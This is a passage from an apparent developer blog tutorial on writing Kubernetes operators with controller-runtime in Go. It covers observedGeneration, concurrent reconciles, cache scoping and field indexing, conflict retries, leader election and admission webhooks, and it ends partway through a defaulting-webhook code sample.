&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjzscln1ch3h760x6buy5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjzscln1ch3h760x6buy5.png" alt="image" width="800" height="535"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The pattern lets any observer — including &lt;code&gt;kubectl wait&lt;/code&gt;, GitOps controllers, and your own tooling — determine whether the controller has finished processing the latest spec without any out-of-band signaling:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Reconciler&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;Reconcile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Context&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Request&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;db&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;myv1&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Database&lt;/span&gt;&lt;span class="p"&gt;{}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NamespacedName&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;{},&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IgnoreNotFound&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c"&gt;// ... reconcile logic ...&lt;/span&gt;

    &lt;span class="c"&gt;// At the end: stamp observedGeneration&lt;/span&gt;
    &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Status&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ObservedGeneration&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Generation&lt;/span&gt;
    &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Status&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Phase&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"Running"&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;{},&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Status&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Update&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Without &lt;code&gt;observedGeneration&lt;/code&gt;, a &lt;code&gt;status.phase: Running&lt;/code&gt; is ambiguous — it could mean "running the spec you just applied 30 seconds ago" or "running an old spec that's three versions behind." With it, observers have a precise, reliable signal.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Concurrency, MaxConcurrentReconciles, and Cache Scoping
&lt;/h2&gt;

&lt;h3&gt;
  
  
  MaxConcurrentReconciles
&lt;/h3&gt;

&lt;p&gt;By default, controller-runtime runs &lt;strong&gt;one reconciler goroutine per controller&lt;/strong&gt;. For many operators this is fine, but for operators managing hundreds or thousands of independent custom resources, this is a significant throughput bottleneck. Enter &lt;code&gt;MaxConcurrentReconciles&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NewControllerManagedBy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;mgr&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;
    &lt;span class="n"&gt;For&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;myv1&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Database&lt;/span&gt;&lt;span class="p"&gt;{})&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;
    &lt;span class="n"&gt;WithOptions&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;controller&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Options&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;MaxConcurrentReconciles&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="m"&gt;10&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;})&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;
    &lt;span class="n"&gt;Complete&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This allows up to 10 reconciler goroutines to run in parallel for different objects. A few important points:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The work queue guarantees per-object serialization.&lt;/strong&gt; Even with &lt;code&gt;MaxConcurrentReconciles: 10&lt;/code&gt;, the same &lt;code&gt;namespace/name&lt;/code&gt; key will never be dispatched to two goroutines simultaneously. You get concurrency across different objects, not within a single object's reconciliation chain.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Your reconciler must be goroutine-safe.&lt;/strong&gt; Any shared state (metrics counters, caches, client connections) must be safe for concurrent access. The controller-runtime client is safe. Custom state you add to the reconciler struct is your responsibility.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Rate limiting still applies globally.&lt;/strong&gt; High &lt;code&gt;MaxConcurrentReconciles&lt;/code&gt; combined with a tight rate limiter creates goroutines waiting on the rate limiter. Tune both together.&lt;/p&gt;

&lt;p&gt;A good starting heuristic: set &lt;code&gt;MaxConcurrentReconciles&lt;/code&gt; to roughly the number of objects you expect divided by the average reconcile latency in seconds. For 1000 objects reconciling in ~500ms each, &lt;code&gt;MaxConcurrentReconciles: 5&lt;/code&gt; gives you comfortable throughput headroom.&lt;/p&gt;

&lt;h3&gt;
  
  
  Cache Scoping for Large Clusters
&lt;/h3&gt;

&lt;p&gt;By default, the controller-runtime cache watches all namespaces. In large multi-tenant clusters this can mean caching thousands of objects your operator doesn't care about. Cache scoping is the solution:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="n"&gt;mgr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NewManager&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Options&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;Cache&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="n"&gt;cache&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Options&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="c"&gt;// Only cache objects in specific namespaces&lt;/span&gt;
        &lt;span class="n"&gt;DefaultNamespaces&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="k"&gt;map&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="n"&gt;cache&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Config&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="s"&gt;"tenant-a"&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{},&lt;/span&gt;
            &lt;span class="s"&gt;"tenant-b"&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{},&lt;/span&gt;
        &lt;span class="p"&gt;},&lt;/span&gt;
    &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Field indexing&lt;/strong&gt; is another powerful tool. If your reconciler frequently lists objects filtered by a custom field, add an index to the cache:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="c"&gt;// Index Databases by their referenced Secret name&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;mgr&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;GetFieldIndexer&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IndexField&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;myv1&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Database&lt;/span&gt;&lt;span class="p"&gt;{},&lt;/span&gt;
    &lt;span class="s"&gt;".spec.credentialsSecret"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;func&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;obj&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Object&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;db&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;obj&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;myv1&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Database&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Spec&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;CredentialsSecret&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c"&gt;// Now you can efficiently list all DBs referencing a secret&lt;/span&gt;
&lt;span class="n"&gt;dbList&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;myv1&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;DatabaseList&lt;/span&gt;&lt;span class="p"&gt;{}&lt;/span&gt;
&lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;List&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dbList&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;MatchingFields&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="s"&gt;".spec.credentialsSecret"&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="n"&gt;secretName&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Without an index, this &lt;code&gt;List&lt;/code&gt; does a full cache scan. With it, it's an O(1) lookup. At scale, this is the difference between a 1ms and 200ms reconciliation.&lt;/p&gt;

&lt;h3&gt;
  
  
  Optimistic Locking and Conflict Retries
&lt;/h3&gt;

&lt;p&gt;API server conflicts (&lt;code&gt;409 Conflict&lt;/code&gt;) are a normal part of operating at scale. When your reconciler reads an object, modifies it, and writes it back — and something else has modified it in between — you get a conflict. The correct response is to re-read and retry:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="s"&gt;"k8s.io/client-go/util/retry"&lt;/span&gt;

&lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;retry&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;RetryOnConflict&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;retry&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;DefaultRetry&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;func&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="kt"&gt;error&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c"&gt;// Re-fetch to get the latest resourceVersion&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NamespacedName&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="c"&gt;// Apply your changes to the freshly-fetched object&lt;/span&gt;
    &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Status&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Phase&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;computedPhase&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Status&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Update&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;retry.DefaultRetry&lt;/code&gt; uses exponential backoff (5 retries, 10ms base, 1.0 jitter). For status updates this is usually sufficient. For spec updates, prefer server-side apply which handles conflicts at the field ownership level rather than requiring a full re-read/retry.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Leader Election
&lt;/h2&gt;

&lt;p&gt;In production, you run multiple replicas of your operator for high availability. But you don't want multiple replicas simultaneously reconciling the same objects — that leads to conflicts and thrashing. Leader election solves this.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fph1wqxo38obluiqhtwrm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fph1wqxo38obluiqhtwrm.png" alt="image" width="800" height="658"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Controller-runtime uses a &lt;strong&gt;Lease&lt;/strong&gt; object in the cluster as the distributed lock. The leader holds the lease by periodically renewing it. If the leader fails to renew before the lease expires, another replica acquires it.&lt;/p&gt;

&lt;p&gt;Configuration in controller-runtime:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="n"&gt;mgr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NewManager&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Options&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;LeaderElection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;          &lt;span class="no"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;LeaderElectionID&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;        &lt;span class="s"&gt;"my-operator-leader"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;LeaderElectionNamespace&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s"&gt;"my-operator-system"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;LeaseDuration&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;           &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;leaseDuration&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c"&gt;// default 15s&lt;/span&gt;
    &lt;span class="n"&gt;RenewDeadline&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;           &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;renewDeadline&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c"&gt;// default 10s&lt;/span&gt;
    &lt;span class="n"&gt;RetryPeriod&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;             &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;retryPeriod&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;    &lt;span class="c"&gt;// default 2s&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Standby replicas still run the cache&lt;/strong&gt; — they maintain informers and local caches, but they don't start the controllers. This means failover is fast (no cold start for the informer sync) because the new leader already has a warm cache.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Important nuance&lt;/strong&gt;: Leader election &lt;em&gt;reduces&lt;/em&gt; the likelihood of concurrent reconciliations, but it does not eliminate it entirely. During the lease expiry window, a brief overlap is possible where both the old and new leader are active. Controllers must still be written to tolerate conflicts and retries. Never assume strict single-threaded execution at the cluster level — your reconciler must be safe to run concurrently.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Caution&lt;/strong&gt;: Leader election adds latency to recovery. With &lt;code&gt;LeaseDuration=15s&lt;/code&gt;, a leader failure can cause up to 15 seconds of no-reconciliation. Tune this based on your operator's latency requirements.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Webhooks: Admission and Conversion
&lt;/h2&gt;

&lt;p&gt;Webhooks are the mechanism to inject logic into the API server's request pipeline.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyjlerewkctr4utbt6rsg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyjlerewkctr4utbt6rsg.png" alt="image" width="800" height="269"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Defaulting Webhooks (MutatingAdmissionWebhook)&lt;/strong&gt; run before storage and let you inject default field values. This is essential for forward compatibility — when you add a new required field to v2 of your CRD, a defaulting webhook can populate it for resources created without it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Validating Webhooks (ValidatingAdmissionWebhook)&lt;/strong&gt; run after mutation and let you reject invalid requests with human-readable error messages. This is where you enforce complex business rules that can't be expressed in OpenAPI schema (cross-field validation, external system checks, etc.).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Conversion Webhooks&lt;/strong&gt; are needed when you have multiple active API versions of a CRD. The API server stores objects in one version (the &lt;code&gt;storage: true&lt;/code&gt; version) but can serve them in other versions. Conversion webhooks handle the transformation between versions.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="c"&gt;// controller-runtime webhook setup&lt;/span&gt;
&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Database&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;Default&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Spec&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Replicas&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;defaultReplicas&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="kt"&gt;int32&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Spec&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Replicas&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;defaultReplicas&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

